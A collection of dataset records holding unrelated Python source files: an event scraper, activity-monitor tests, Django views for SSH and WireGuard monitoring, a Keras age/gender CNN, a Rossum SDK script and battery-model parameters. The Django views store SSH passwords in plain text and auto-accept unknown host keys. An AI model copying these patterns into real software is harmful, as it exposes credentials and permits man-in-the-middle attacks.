main()\n\n","repo_name":"inconvergent/differential-line","sub_path":"main_line.py","file_name":"main_line.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":675,"dataset":"github-code","pt":"44"} +{"seq_id":"26045237396","text":"import requests\nimport extruct\nheaders= {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.3'}\n\n#method to check status of url\ndef is_url_ok(url):\n try:\n return 200 == requests.head(url).status_code\n except Exception:\n return False\n\ndef clean_data(data):\n out=[]\n if data['json-ld']!=[]:\n for rec in data['json-ld']:\n try:\n if rec['@type'] == 'Event':\n d = rec.copy()\n out.append(d)\n except KeyError:\n pass\n\n if data['microdata'] != []:\n for rec in data['microdata']:\n try:\n if rec['type'] in ('http://schema.org/Event',\n 'https://schema.org/Event'):\n d = rec['properties'].copy()\n # @context and @type to match json-ld style\n if rec['type'][:6] == 'https:':\n d['@context'] = 'https://schema.org'\n else:\n d['@context'] = 'http://schema.org'\n d['@type'] = 'Event'\n\n for key in d.keys():\n if isinstance(d[key], dict) and 'type' in d[key]:\n type_ = d[key].pop('type')\n d[key]['@type'] = type_.split('/')[3] # taking last part of url which holds type\n\n out.append(d)\n except KeyError as ke:\n print(\"Exception :\",ke)\n\n return out\n\ndef parse_from_url(url):\n if not isinstance(url,str):\n raise TypeError\n good_data={}\n if(is_url_ok(url)):\n response = requests.get(url, headers=headers)\n data = extruct.extract(response.text, response.url)\n good_data=clean_data(data)\n else:\n print('URL may be Dead/Not Working !')\n\n return good_data","repo_name":"rohitbabugaddeti/events-scraper","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"7046641648","text":"import pytest\n\nimport tests.testsHelper as Hlp\n\n#################################################################################################\n# TimeStamp tests\n#################################################################################################\n\n\n@pytest.mark.parametrize('timeDigitsTup, expectedResult',\n [\n (([20, 3, 8], [20, 3, 8]), 0),\n (([20, 3, 8], [20, 3, 18]), 10),\n (([20, 3, 8], [21, 3, 8]), 3600)\n\n ])\ndef test_TS_calculateTimeDiff(timeDigitsTup, expectedResult):\n # arrange\n ts = Hlp.createTimestamp(timeDigitsTup)\n\n # act\n result = ts.calculateTimeDiffInSecs()\n\n # assert\n assert result == expectedResult\n\n\ndef test_TS_equality():\n # arrange\n ts1 = Hlp.createTimestamp(([20, 3, 8], [20, 3, 8]))\n ts2 = Hlp.createTimestamp(([20, 3, 8], [20, 3, 8]))\n ts3 = Hlp.createTimestamp(([21, 10, 8], [22, 0, 0]))\n\n # act\n # well, not this time my friend ;)\n\n # assert\n assert ts1 == ts2\n assert ts1 != ts3\n\n\n#################################################################################################\n# DetailedInstance tests\n#################################################################################################\n\n\n@pytest.mark.parametrize('timeDigitsTupList, expectedResult',\n [\n ([([20, 3, 8], [20, 3, 8])], 0),\n ([([20, 3, 8], [20, 3, 18])], 10),\n ([([20, 3, 8], [21, 3, 8])], 3600),\n ([([20, 3, 8], [21, 3, 8]), ([22, 0, 0], [23, 0, 0])], 7200)\n ])\ndef test_DI_totalTimeInNew(timeDigitsTupList, expectedResult):\n # arrange\n di = Hlp.createDetailedInstance(timeDigitsTupList, 'youtube')\n\n # act\n totalTime = di.totalTime\n\n # assert\n assert totalTime == expectedResult\n\n\n# TODO: maybe more friendly parameters, so we don't have to keep in mind that 10sec for the initial timestamp?\n@pytest.mark.parametrize('newTimestampDigits, expectedTimestampsCount, expectedTotalTime',\n [\n (([20, 0, 0], [20, 0, 10]), 1, 10),\n (([20, 4, 0], [20, 4, 30]), 2, 40)\n ])\ndef test_DI_addingNewTimetamp(newTimestampDigits, expectedTimestampsCount, expectedTotalTime):\n # arrange\n di = Hlp.createDetailedInstance([([20, 0, 0], [20, 0, 10])], 'youtube')\n\n # act\n di.addTimeStamp(Hlp.createTimestamp(newTimestampDigits))\n\n # assert\n assert len(di.timestamps) == expectedTimestampsCount\n assert di.totalTime == expectedTotalTime\n\n\n#################################################################################################\n# ApplicationWithInstances tests\n#################################################################################################\n\n\ndef test_AWI_updateExistingInstance():\n # arrange\n app = Hlp.createBasicApp([([20, 0, 0], [20, 0, 10])], 'youtube.com', 'opera')\n di = Hlp.createDetailedInstance([([20, 30, 0], [20, 30, 30])], 'youtube.com')\n\n # act\n app.updateOrAddInstance(di)\n\n # assert\n assert len(app.instances) == 1\n assert len(app.instances[0].timestamps) == 2\n assert app.instances[0].totalTime == 40\n\n\ndef test_AWI_addNewInstance():\n # arrange\n app = Hlp.createBasicApp([([20, 0, 0], [20, 0, 10])], 'youtube.com', 'opera')\n di = Hlp.createDetailedInstance([([19, 30, 0], [19, 31, 0])], 'howtostaycool.com')\n\n # act\n app.updateOrAddInstance(di)\n\n # assert\n assert len(app.instances) == 2\n assert len(app.instances[0].timestamps) == 1\n assert len(app.instances[1].timestamps) == 1\n\n assert app.instances[0].totalTime == 10\n assert app.instances[1].totalTime == 60\n\n\ndef test_AWI_updateBasedOnOtherAppSameInstances():\n # arrange\n app1 = Hlp.createBasicApp([([20, 0, 0], [20, 0, 10])], 'youtube.com', 'opera')\n app2 = Hlp.createBasicApp([([20, 10, 0], [20, 10, 30])], 'youtube.com', 'opera')\n\n # act\n app1.updateBasedOnOther(app2)\n\n # assert\n assert len(app1.instances) == 1\n assert len(app1.instances[0].timestamps) == 2\n assert app1.instances[0].totalTime == 40\n\n assert len(app2.instances[0].timestamps) == 1\n assert app2.instances[0].totalTime == 30\n\n\ndef test_AWI_updateBasedOnOtherAppDifferentIsntances():\n # arrange\n app1 = Hlp.createBasicApp([([20, 0, 0], [20, 0, 10])], 'youtube.com', 'opera')\n app2 = Hlp.createBasicApp([([20, 10, 0], [20, 10, 30])], 'howtostaycool.com', 'opera')\n\n # act\n app1.updateBasedOnOther(app2)\n\n # assert\n assert len(app1.instances) == 2\n assert len(app1.instances[0].timestamps) == 1\n assert len(app1.instances[1].timestamps) == 1\n assert app1.instances[0].totalTime == 10\n assert app1.instances[1].totalTime == 30\n\n assert len(app2.instances) == 1\n assert len(app2.instances[0].timestamps) == 1\n\n\ndef test_AWI_updateBasedOnOtherAppDifferentAppName():\n # arrange\n app1 = Hlp.createBasicApp([([20, 0, 0], [20, 0, 10])], 'youtube.com', 'opera')\n app2 = Hlp.createBasicApp([([20, 10, 0], [20, 10, 30])], 'youtube.com', 'chrome')\n\n # act\n app1.updateBasedOnOther(app2)\n\n # assert\n assert len(app1.instances) == 1\n assert len(app1.instances[0].timestamps) == 1\n\n assert len(app2.instances) == 1\n assert len(app2.instances[0].timestamps) == 1\n\ndef test_AWI_sumOfTotalTimeForApplication():\n # arrange\n timestamp = [([20, 0, 0], [20, 0, 10]), ([19, 0, 0], [19, 0, 10])]\n app = Hlp.createBasicApp(timestamp, 'youtube.com', 'opera')\n\n # act\n calculatedTime = app.sumOfTotalTimeForApplication()\n expectedTime = 0\n for tup in timestamp:\n for number in range(len(tup[0])):\n expectedTime += tup[1][number] - tup[0][number]\n\n # assert\n assert calculatedTime == expectedTime\n","repo_name":"Barud21/ActivityMonitor","sub_path":"tests/test_ApplicationObjects.py","file_name":"test_ApplicationObjects.py","file_ext":"py","file_size_in_byte":5929,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"9277932086","text":"# -*- encoding: utf-8 -*-\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth import authenticate, login, logout, update_session_auth_hash\nfrom django import template\nfrom django.contrib.auth.hashers import make_password\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nfrom django.template import loader\nfrom django.urls import reverse\nfrom monitor.forms import *\nfrom monitor.models import *\nfrom django.contrib.auth.models import User\nfrom django.contrib import messages\nfrom datetime import datetime, date, timedelta\nfrom django.contrib.auth.models import Group\nfrom django.utils.timezone import utc\nimport datetime\nimport paramiko\nfrom django.contrib.auth.tokens import PasswordResetTokenGenerator\nfrom django.utils.encoding import force_bytes, force_str\nfrom django.contrib.auth import views as auth_views\nfrom django.utils.crypto import get_random_string\nfrom utilidades.funciones import ejecutar_comando_remoto, prueba_conexion, cliente_monitor\n## correo ##\nfrom django.core.mail import EmailMessage, send_mail, EmailMultiAlternatives\nfrom django.template.loader import render_to_string\nfrom django.utils.html import strip_tags\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom asgiref.sync import sync_to_async\nimport asyncio\n## correo ##\n\n\n@login_required(login_url='login')\ndef conexiones_ssh(request):\n user = request.user.id\n datos = Ssh_connect.objects.filter(user_creator__exact=user)\n return render(request,'monitor/pages/connect-ssh.html',{'datos':datos})\n\n@login_required(login_url='login')\ndef add_ssh(request):\n user_auth = request.user.id\n if request.method == \"POST\":\n form = Formulario_ssh(request.POST)\n if form.is_valid():\n data = form.cleaned_data \n nombre = data['nombre']\n user = data['user']\n ipHost = data['ipHost']\n puerto = data['puerto']\n passwd = data['passwd']\n obj_model= Ssh_connect()\n obj_model.user_creator = user_auth\n obj_model.nombre = nombre\n obj_model.user = user\n obj_model.ipHost = ipHost\n obj_model.puerto = puerto\n obj_model.passwd = passwd\n obj_model.save()\n return redirect(\"/\")\n else: \n messages.add_message(request,messages.WARNING, \"Error en el formulario\")\n \n else:\n form = Formulario_ssh() \n \n return render(request,'monitor/pages/add-ssh.html',{'form':form})\n\n\n\n@login_required(login_url='login')\ndef estado_ssh(request, id):\n estado = None\n model = Ssh_connect.objects.filter(id__exact = id)\n objmodel = model.first()\n ssh_client = paramiko.SSHClient()\n ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n try:\n ssh_client.connect(f'{objmodel.ipHost}', username=f'{objmodel.user}', password=f'{objmodel.passwd}', port=f'{objmodel.puerto}')\n ssh_client.close() \n estado = True\n\n except:\n messages.add_message(request,messages.WARNING, \"Error de conexión con el host\")\n estado = False\n \n \n return render(request,'monitor/pages/connect-ssh.html',{'estado':estado,'datos':model})\n\n@login_required(login_url='login')\ndef monitor_vpn(request, id):\n peer_model = Peer_monitor.objects.all().delete()\n cliente = {}\n try:\n output = ejecutar_comando_remoto(id,\"wg show\") \n lines = output.strip().split('\\n')\n for line in lines: \n if \"peer\" in line:\n peer = line.split(':')[1].strip() \n cliente['peer'] = peer \n elif \"endpoint\" in line:\n endpoint = line.split(':')[1].strip()\n cliente['endpoint'] = endpoint \n elif \"allowed ips\" in line:\n allowed = line.split(':')[1].strip()\n cliente['allowed_ips'] = allowed\n elif \"latest handshake\" in line:\n latest = line.split(':')[1].strip()\n cliente['latest_handshake'] = latest\n elif \"transfer\" in line:\n transfer = line.split(':')[1].strip()\n cliente['transfer'] = transfer \n \n create = Peer_monitor.objects.create(publicKey = cliente['peer'],endpoint = cliente['endpoint'], transfer = cliente['transfer'], latest_handshake = cliente['latest_handshake'],allowedIps=cliente['allowed_ips']) \n except:\n messages.add_message(request,messages.WARNING, \"Error de conexión con el host\")\n return HttpResponseRedirect('/')\n \n peer_model = Peer_monitor.objects.all()\n\n return render(request,'monitor/pages/monitor-vpn.html',{'peer':peer_model})\n\n@login_required(login_url='login')\ndef add_vpn_server(request):\n user_auth = request.user.id\n if request.method == \"POST\":\n form = Vpn_serverForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data \n nombre = data['nombre']\n publicKey = data['publicKey']\n privateKey = data['privateKey']\n ip_address = data['ip_address']\n puerto = data['puerto']\n obj_model= Peer_server()\n obj_model.user_creator = user_auth\n obj_model.nombre = nombre\n obj_model.publicKey = publicKey\n obj_model.privateKey = privateKey\n obj_model.ip_address = ip_address\n obj_model.puerto = puerto\n obj_model.save()\n return redirect(\"/\")\n else: \n messages.add_message(request,messages.WARNING, \"Error en el formulario\")\n \n else:\n form = Vpn_serverForm() \n \n return render(request,'monitor/pages/add-vpn-server.html',{'form':form})","repo_name":"Godleveleo/wiremonitor","sub_path":"core/monitor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14148957183","text":"import os\nimport numpy as np\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D, BatchNormalization\nfrom keras.optimizers import Adam\nfrom keras.preprocessing.image import ImageDataGenerator\n\nimport utils as myutils\n\n\nclass AgeGenderModel(object):\n def __init__(self, model_variables, variables, database):\n self.MV = model_variables\n self.Vars = variables\n self.DB = database\n self.model = None\n self.weight_save_path = \"saved_weights\"\n self.outputs_path = \"outputs\"\n self.model_name = self.Vars[\"name\"]\n\n if self.Vars[\"class\"] == \"age\":\n self.model_class = \"age\"\n self.class_count = self.DB.age_class_count\n self.class_labels = self.DB.age_labels\n self.db_train_path = self.DB.db_age_train_folder_path\n self.db_test_path = self.DB.db_age_test_folder_path\n self.mean_image = myutils.load_image( self.DB.age_mean_image_path )\n elif self.Vars[\"class\"] == \"sex\":\n self.model_class = \"sex\"\n self.class_count = self.DB.sex_class_count\n self.class_labels = self.DB.sex_labels\n self.db_train_path = self.DB.db_sex_train_folder_path\n self.db_test_path = self.DB.db_sex_test_folder_path\n self.mean_image = myutils.load_image( self.DB.sex_mean_image_path )\n\n self.class_weights = myutils.load_obj(\n self.DB.db_new_path + \"/\" + self.model_class)\n\n def create_model(self):\n self.model = Sequential([\n Conv2D(\n self.MV[\"conv1\"][\"filter_size\"],\n tuple(self.MV[\"conv1\"][\"kernel_size\"]),\n strides=tuple(self.MV[\"conv1\"][\"stride\"]),\n padding=self.MV[\"conv1\"][\"padding\"],\n bias_initializer=self.MV[\"conv1\"][\"bias\"],\n activation='relu',\n input_shape=self.DB.input_shape),\n MaxPooling2D(\n pool_size=tuple(self.MV[\"pool1\"][\"pool_shape\"]),\n strides=tuple(self.MV[\"pool1\"][\"stride\"]),\n padding=self.MV[\"pool1\"][\"padding\"]),\n\n # Used batch normalization instead of local response normalization\n BatchNormalization(),\n Conv2D(\n self.MV[\"conv2\"][\"filter_size\"],\n tuple(self.MV[\"conv2\"][\"kernel_size\"]),\n strides=tuple(self.MV[\"conv2\"][\"stride\"]),\n padding=self.MV[\"conv2\"][\"padding\"],\n bias_initializer=self.MV[\"conv2\"][\"bias\"],\n activation='relu'),\n MaxPooling2D(\n pool_size=tuple(self.MV[\"pool2\"][\"pool_shape\"]),\n strides=tuple(self.MV[\"pool2\"][\"stride\"]),\n padding=self.MV[\"pool2\"][\"padding\"]),\n\n # Used batch normalization instead of local response normalization\n BatchNormalization(),\n Conv2D(\n self.MV[\"conv3\"][\"filter_size\"],\n tuple(self.MV[\"conv3\"][\"kernel_size\"]),\n strides=tuple(self.MV[\"conv3\"][\"stride\"]),\n padding=self.MV[\"conv3\"][\"padding\"],\n bias_initializer=self.MV[\"conv3\"][\"bias\"],\n activation='relu'),\n MaxPooling2D(\n pool_size=tuple(self.MV[\"pool3\"][\"pool_shape\"]),\n strides=tuple(self.MV[\"pool3\"][\"stride\"]),\n padding=self.MV[\"pool3\"][\"padding\"]),\n Flatten(),\n Dense(\n self.MV[\"dense1\"], bias_initializer=\"ones\", activation='relu'),\n Dropout(self.MV[\"drop1\"]),\n Dense(\n self.MV[\"dense2\"], bias_initializer=\"ones\", activation='relu'),\n Dropout(self.MV[\"drop2\"]),\n Dense(\n self.class_count,\n bias_initializer=\"ones\",\n activation='softmax')\n ])\n\n adam = Adam(lr=self.MV[\"learning_rate\"], decay=self.MV[\"decay\"])\n\n self.model.compile(\n loss='categorical_crossentropy',\n optimizer=adam,\n metrics=['accuracy'])\n\n def init_image_data_generators(self):\n self.train_idgen = ImageDataGenerator(\n featurewise_center=True,\n rescale=1. / 255,\n rotation_range=10,\n height_shift_range=0.10,\n width_shift_range=0.10,\n horizontal_flip=True)\n\n self.test_idgen = ImageDataGenerator(\n rescale=1. / 255,\n featurewise_center=True)\n \n mean_img_norm = np.asarray(self.mean_image,np.float32)\n mean_img_norm /= 255 \n self.train_idgen.mean = mean_img_norm\n self.test_idgen.mean = mean_img_norm\n\n self.train_idgen_flow = self.train_idgen.flow_from_directory(\n self.db_train_path,\n classes=self.class_labels,\n target_size=(int(self.Vars[\"img_in_height\"]),\n int(self.Vars[\"img_in_width\"])),\n batch_size=int(self.Vars[\"batch_size\"]),\n class_mode='categorical',\n shuffle=True)\n\n self.test_idgen_flow = self.test_idgen.flow_from_directory(\n self.db_test_path,\n classes=self.class_labels,\n target_size=(int(self.Vars[\"img_in_height\"]),\n int(self.Vars[\"img_in_width\"])),\n batch_size=int(self.Vars[\"batch_size\"]),\n class_mode='categorical')\n\n def train(self):\n self.model.fit_generator(\n self.train_idgen_flow,\n steps_per_epoch=self.train_idgen_flow.n //\n self.train_idgen_flow.batch_size,\n epochs=int(self.Vars[\"epoch\"]),\n class_weight=self.class_weights,\n# validation_data=self.test_idgen_flow,\n# validation_steps= self.test_idgen_flow.n//self.test_idgen_flow.batch_size ,\n workers=1,\n verbose=2)\n\n def test(self):\n self.test_idgen_flow.reset()\n score = self.model.evaluate_generator(\n self.test_idgen_flow,\n self.test_idgen_flow.n // self.test_idgen_flow.batch_size)\n print(\"Test Score\") \n print(\"Loss: {:.3f}\\tAccuracy: {:.3f}\".format(score[0], score[1]))\n\n def predict_test(self):\n self.test_idgen_flow.reset()\n predictions = np.empty(shape=[0, self.class_count])\n true_classes = np.empty(shape=[0, self.class_count])\n for i in range(self.test_idgen_flow.n//self.test_idgen_flow.batch_size):\n X_batch , Y_batch = self.test_idgen_flow.next()\n preds= self.model.predict(X_batch,batch_size=self.test_idgen_flow.batch_size)\n \n true_classes = np.append(true_classes, Y_batch, axis=0)\n predictions = np.append(predictions, preds, axis=0)\n \n return predictions,true_classes\n\n def save_model_weights(self):\n if not os.path.exists(self.weight_save_path):\n os.makedirs(self.weight_save_path)\n path = self.weight_save_path + \"/\" + self.Vars[\"name\"] + \".h5\"\n self.model.save_weights(path)\n\n def load_model_weights(self):\n path = self.weight_save_path + \"/\" + self.Vars[\"name\"] + \".h5\"\n self.model.load_weights(path)\n\n\ndef print_preds(agm, predictions, true_values, accuracy, my_accuracy, f1sc):\n from utils import log_preds\n log_preds(\n \"Path\\t\\t\\t\\t True Class\\t Predicted Class\\tACCURACY = {:.3f}\\tMY ACCURACY = {:.3f}\\tF1 Score = {:.3f}\".\n format(accuracy, my_accuracy, f1sc), agm.model_name)\n for i in range(len(predictions)):\n\n log_str = \"{}\\t {}\\t\".format(agm.test_idgen_flow.filenames[i],\n true_values[i])\n for j in range(len(predictions[0]) - 1):\n log_str += \"{:.2f}\\t\".format(predictions[i][j])\n log_str += \"{:.2f}\".format(predictions[i][len(predictions[0]) - 1])\n log_preds(log_str, agm.model_name)\n\n\n# Just for debug\n#from keras.preprocessing.image import ImageDataGenerator\n#import numpy as np\n#\n#train_idgen = ImageDataGenerator(\n# featurewise_std_normalization=True\n# ,rescale=1. / 255\n# ,shear_range=0.10\n# ,rotation_range=20\n# ,height_shift_range=0.10\n# ,width_shift_range=0.10\n# ,horizontal_flip=True\n# )\n#\n#sample_data_gen_flow = ImageDataGenerator(rescale= 1. /255).flow_from_directory(\n# \"DB/age/train\",\n# target_size=(227,227),\n# batch_size= 64,\n# class_mode='categorical',\n# shuffle=True)\n#\n#X , _ = sample_data_gen_flow.next()\n#for i in range( 1000 // 64 ):\n# X2 , _ = sample_data_gen_flow.next()\n# X = np.append(X,X2, axis=0)\n#\n#train_idgen.fit(X)\n#\n#train_idgen_flow = train_idgen.flow_from_directory(\n# \"DB/age/train\",\n# target_size=(227,227),\n# batch_size=64,\n# class_mode='categorical'\n# ,save_to_dir=\"outputs\\\\aug_train\"\n# )\n#train_idgen_flow.next()\n#train_idgen_flow.reset()\n","repo_name":"ferhatminder/Age-and-Gender-Classification-Using-CNN-Keras","sub_path":"age_gender_model.py","file_name":"age_gender_model.py","file_ext":"py","file_size_in_byte":8974,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"12306352832","text":"\"\"\"A script that tests all operations over a single resource provided by Elis API.\n\nIt could evolve in time into an E2E test.\n\"\"\"\nfrom __future__ import annotations\n\nimport asyncio\nimport logging\nimport os\nimport random\n\nimport aiofiles\n\nfrom rossum_api import ElisAPIClient, ElisAPIClientSync\nfrom rossum_api.api_client import APIClient\n\nlogging.basicConfig()\nlogging.getLogger().setLevel(logging.DEBUG)\n\nWORKSPACE = {\n \"name\": \"Rossum Client NG Test\",\n \"organization\": \"https://elis.develop.r8.lol/api/v1/organizations/167\",\n}\n\nSCHEMA = {\n \"id\": 31336,\n \"name\": \"Rossum NG Test Schema\",\n \"queues\": [\"https://elis.rossum.ai/api/v1/queues/8236\"],\n \"url\": \"https://elis.rossum.ai/api/v1/schemas/31336\",\n \"content\": [\n {\n \"category\": \"section\",\n \"id\": \"invoice_details_section\",\n \"label\": \"Invoice details\",\n \"children\": [\n {\n \"category\": \"datapoint\",\n \"id\": \"document_id\",\n \"label\": \"Invoice number\",\n \"type\": \"string\",\n \"rir_field_names\": [\"document_id\"],\n \"constraints\": {\"required\": False},\n \"default_value\": None,\n },\n ],\n },\n ],\n \"metadata\": {},\n}\n\n\nasync def main():\n client = APIClient(\n os.environ[\"ELIS_USERNAME\"],\n os.environ[\"ELIS_PASSWORD\"],\n base_url=\"https://elis.develop.r8.lol/api/v1\",\n )\n workspace = await client.create(\"workspaces\", data=WORKSPACE)\n response = await client.fetch_one(\"workspaces\", id_=workspace[\"id\"])\n print(\"GET result:\", response)\n print(\"LIST results:\")\n async for w in client.fetch_all(\"workspaces\", ordering=[\"-id\"], name=WORKSPACE[\"name\"]):\n print(w)\n response = await client.replace(\n \"workspaces\",\n id_=workspace[\"id\"],\n data={**WORKSPACE, \"name\": WORKSPACE[\"name\"]},\n )\n print(\"PUT result:\", response)\n response = await client.update(\n \"workspaces\",\n id_=workspace[\"id\"],\n data={\"name\": f\"{WORKSPACE['name']} {random.randint(1, 100)}\"},\n )\n print(\"PATCH result:\", response)\n\n # Upload a document -- schema and queue must be created to do that\n schema = await client.create(\"schemas\", data=SCHEMA)\n queue = await client.create(\n \"queues\",\n data={\n \"workspace\": workspace[\"url\"],\n \"name\": \"Rossum Client NG Test\",\n \"schema\": schema[\"url\"],\n },\n )\n\n async with aiofiles.open(\"tests/data/sample_invoice.pdf\", \"rb\") as fp:\n response = await client.upload(\n \"queues\",\n id_=queue[\"id\"],\n fp=fp,\n filename=\"filename.pdf\",\n values={\"upload:organization_unit\": \"Sales\"},\n metadata={\"project\": \"Market ABC\"},\n )\n print(\"UPLOAD result:\", response)\n\n print(\"EXPORT result:\")\n async for chunk in client.export(\n \"queues\",\n id_=queue[\"id\"],\n export_format=\"xml\",\n page_size=200,\n columns=[\"meta_file_name\", \"document_id\", \"status\"],\n ):\n print(chunk)\n\n response = await client.delete(\"workspaces\", id_=workspace[\"id\"])\n print(f\"Workspace {workspace['id']} deleted.\")\n\n\nasync def main_with_async_client():\n client = ElisAPIClient(\n os.environ[\"ELIS_USERNAME\"],\n os.environ[\"ELIS_PASSWORD\"],\n base_url=\"https://elis.develop.r8.lol/api/v1\",\n )\n workspace = await client.create_new_workspace(data=WORKSPACE)\n workspace = await client.retrieve_workspace(workspace.id)\n print(\"GET result:\", workspace)\n print(\"LIST results:\")\n async for w in client.list_all_workspaces([\"-id\"], None, name=WORKSPACE[\"name\"]):\n print(w)\n\n schema = await client.create_new_schema(SCHEMA)\n queue = await client.create_new_queue(\n {\"workspace\": workspace.url, \"name\": \"Rossum Client NG Test\", \"schema\": schema.url}\n )\n (annotation_id,) = await client.import_document(\n queue.id, [(\"tests/data/sample_invoice.pdf\", \"Sample Invoice\")]\n )\n\n print(\"Polling until annotation is ready to review...\")\n annotation = await client.poll_annotation(annotation_id, lambda a: a.status != \"importing\")\n print(f\"Annotation ready to review: {annotation}\")\n\n # Cleanup\n await client.delete_queue(queue.id)\n print(f\"Workspace {workspace.id} deleted.\")\n await client.delete_workspace(workspace.id)\n print(f\"Workspace {workspace.id} deleted.\")\n\n\ndef main_with_sync_client():\n client = ElisAPIClientSync(\n os.environ[\"ELIS_USERNAME\"],\n os.environ[\"ELIS_PASSWORD\"],\n base_url=\"https://elis.develop.r8.lol/api/v1\",\n )\n ws = client.create_new_workspace(data=WORKSPACE)\n workspace_id = ws.id\n ws = client.retrieve_workspace(workspace_id)\n print(\"GET result:\", ws)\n print(\"LIST results:\")\n for w in client.list_all_workspaces([\"-id\"], None, name=WORKSPACE[\"name\"]):\n print(w)\n client.delete_workspace(workspace_id)\n print(f\"Workspace {workspace_id} deleted.\")\n\n\nasyncio.run(main())\n# asyncio.run(main_with_async_client())\n# main_with_sync_client()\n","repo_name":"rossumai/rossum-sdk","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"29429733525","text":"#\n# Standard parameters for lithium-ion battery models\n#\n\"\"\"\nStandard parameters for lithium-ion battery models\n\"\"\"\nimport pybamm\nimport numpy as np\nfrom scipy import constants\n\n\n# --------------------------------------------------------------------------------------\n\"File Layout:\"\n# 1. Dimensional Parameters\n# 2. Dimensional Functions\n# 3. Scalings\n# 4. Dimensionless Parameters\n# 5. Dimensionless Functions\n# 6. Input Current\n\n# --------------------------------------------------------------------------------------\n\"1. Dimensional Parameters\"\n\n# Physical constants\nR = pybamm.Scalar(8.3144621)\n# R = pybamm.Scalar(constants.R)\n# F = pybamm.Scalar(constants.physical_constants[\"Faraday constant\"][0])\nF = pybamm.Scalar(96485.3365)\nT_ref = pybamm.Parameter(\"Reference temperature [K]\")\n\n# Macroscale geometry\nL_cn = pybamm.geometric_parameters.L_cn\nL_n = pybamm.geometric_parameters.L_n\nL_s = pybamm.geometric_parameters.L_s\nL_p = pybamm.geometric_parameters.L_p\nL_cp = pybamm.geometric_parameters.L_cp\nL_x = pybamm.geometric_parameters.L_x\nL_y = pybamm.geometric_parameters.L_y\nL_z = pybamm.geometric_parameters.L_z\nL = pybamm.geometric_parameters.L\nA_cc = pybamm.geometric_parameters.A_cc\n\n# Tab geometry\nL_tab_n = pybamm.geometric_parameters.L_tab_n\nCentre_y_tab_n = pybamm.geometric_parameters.Centre_y_tab_n\nCentre_z_tab_n = pybamm.geometric_parameters.Centre_z_tab_n\nL_tab_p = pybamm.geometric_parameters.L_tab_p\nCentre_y_tab_p = pybamm.geometric_parameters.Centre_y_tab_p\nCentre_z_tab_p = pybamm.geometric_parameters.Centre_z_tab_p\nA_tab_n = pybamm.geometric_parameters.A_tab_n\nA_tab_p = pybamm.geometric_parameters.A_tab_p\n\n# Electrical\nI_typ = pybamm.electrical_parameters.I_typ\nQ = pybamm.electrical_parameters.Q\nC_rate = pybamm.electrical_parameters.C_rate\nn_electrodes_parallel = pybamm.electrical_parameters.n_electrodes_parallel\ni_typ = pybamm.electrical_parameters.i_typ\nvoltage_low_cut_dimensional = pybamm.electrical_parameters.voltage_low_cut_dimensional\nvoltage_high_cut_dimensional = pybamm.electrical_parameters.voltage_high_cut_dimensional\n\n# Electrolyte properties\nc_e_typ = pybamm.Parameter(\"Typical electrolyte concentration [mol.m-3]\")\n\n# Electrode properties\nc_n_max = pybamm.Parameter(\"Maximum concentration in negative electrode [mol.m-3]\")\nc_p_max = pybamm.Parameter(\"Maximum concentration in positive electrode [mol.m-3]\")\nsigma_cn_dimensional = pybamm.Parameter(\n \"Negative current collector conductivity [S.m-1]\"\n)\nsigma_n_dim = pybamm.Parameter(\"Negative electrode conductivity [S.m-1]\")\nsigma_p_dim = pybamm.Parameter(\"Positive electrode conductivity [S.m-1]\")\nsigma_cp_dimensional = pybamm.Parameter(\n \"Positive current collector conductivity [S.m-1]\"\n)\n\n# Microscale geometry\na_n_dim = pybamm.geometric_parameters.a_n_dim\na_p_dim = pybamm.geometric_parameters.a_p_dim\na_k_dim = pybamm.Concatenation(\n pybamm.FullBroadcast(a_n_dim, [\"negative electrode\"], \"current collector\"),\n pybamm.FullBroadcast(0, [\"separator\"], \"current collector\"),\n pybamm.FullBroadcast(a_p_dim, [\"positive electrode\"], \"current collector\"),\n)\nR_n = pybamm.geometric_parameters.R_n\nR_p = pybamm.geometric_parameters.R_p\nb_e_n = pybamm.geometric_parameters.b_e_n\nb_e_s = pybamm.geometric_parameters.b_e_s\nb_e_p = pybamm.geometric_parameters.b_e_p\nb_s_n = pybamm.geometric_parameters.b_s_n\nb_s_s = pybamm.geometric_parameters.b_s_s\nb_s_p = pybamm.geometric_parameters.b_s_p\n\n# Electrochemical reactions\nne_n = pybamm.Parameter(\"Negative electrode electrons in reaction\")\nne_p = pybamm.Parameter(\"Positive electrode electrons in reaction\")\nC_dl_dimensional = pybamm.Parameter(\"Double-layer capacity [F.m-2]\")\n\n\n# Initial conditions\nc_e_init_dimensional = pybamm.Parameter(\n \"Initial concentration in electrolyte [mol.m-3]\"\n)\nc_n_init_dimensional = pybamm.Parameter(\n \"Initial concentration in negative electrode [mol.m-3]\"\n)\nc_p_init_dimensional = pybamm.Parameter(\n \"Initial concentration in positive electrode [mol.m-3]\"\n)\n\n# thermal\nDelta_T = pybamm.thermal_parameters.Delta_T\nthermal_voltage = R * T_ref / F\n\n# Activation energies\nE_r_n = pybamm.thermal_parameters.E_r_n\nE_r_p = pybamm.thermal_parameters.E_r_p\nE_D_s_n = pybamm.thermal_parameters.E_D_s_n\nE_D_s_p = pybamm.thermal_parameters.E_D_s_p\nE_D_e = pybamm.thermal_parameters.E_D_e\nE_k_e = 